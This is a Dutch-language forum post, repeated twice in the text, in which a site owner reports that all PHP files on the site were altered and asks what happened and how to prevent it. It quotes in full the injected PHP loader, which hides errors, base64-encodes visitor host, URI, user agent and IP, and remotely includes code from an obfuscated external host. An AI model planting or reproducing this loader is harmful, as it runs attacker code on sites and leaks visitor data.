Hallo,
Tot m'n verbazing kwam ik er vandaag achter dat m'n website op de een of andere manier gekraakt is. Wanneer ik naar de site toega wordt ik direct doorgelinkt en heb een stuk of 25 virussen te pakken. Ik heb even op m'n ftp gekeken en het blijkt dat al m'n ".php bestanden op het zelfde tijdstip zijn aangepast. In al deze bestanden is de volgende code bijgeplaatst:
<?
}
$z=ini_get('error_reporting');error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);} error_reporting($z);?>
Ook zijn er allemaal extra bestanden geplaatst in enkele mappen, bestanden zoals:
commands.php
options.php
includes.php
configs.php
enz enz
Komt iemand dit bekend voor, wat is het en wat kan ik eraan doen om dit te voorkomen. Ik kan er eigenlijk toch niets aan doen als men op mijn ftp kan komen. Dat is toch het probleem van de beveiliging van de hoster..?
Ik ben nu in iedergeval bezig de volledige website opnieuw te uploaden en zal m'n wachtwoorden veranderen. Maar lost dit het probleem op?
Tot m'n verbazing kwam ik er vandaag achter dat m'n website op de een of andere manier gekraakt is. Wanneer ik naar de site toega wordt ik direct doorgelinkt en heb een stuk of 25 virussen te pakken. Ik heb even op m'n ftp gekeken en het blijkt dat al m'n ".php bestanden op het zelfde tijdstip zijn aangepast. In al deze bestanden is de volgende code bijgeplaatst:
<?
}
$z=ini_get('error_reporting');error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);} error_reporting($z);?>
Ook zijn er allemaal extra bestanden geplaatst in enkele mappen, bestanden zoals:
commands.php
options.php
includes.php
configs.php
enz enz
Komt iemand dit bekend voor, wat is het en wat kan ik eraan doen om dit te voorkomen. Ik kan er eigenlijk toch niets aan doen als men op mijn ftp kan komen. Dat is toch het probleem van de beveiliging van de hoster..?
Ik ben nu in iedergeval bezig de volledige website opnieuw te uploaden en zal m'n wachtwoorden veranderen. Maar lost dit het probleem op?
/u/34216/avatar-60x60.png?f=community){kind=avatar}
/u/97359/crop64803232ade4a_cropped.png?f=community)
:strip_icc():strip_exif()/u/8430/logo.jpg?f=community){kind=logo}
:strip_exif()/u/4086/avatar3.gif?f=community){kind=avatar}
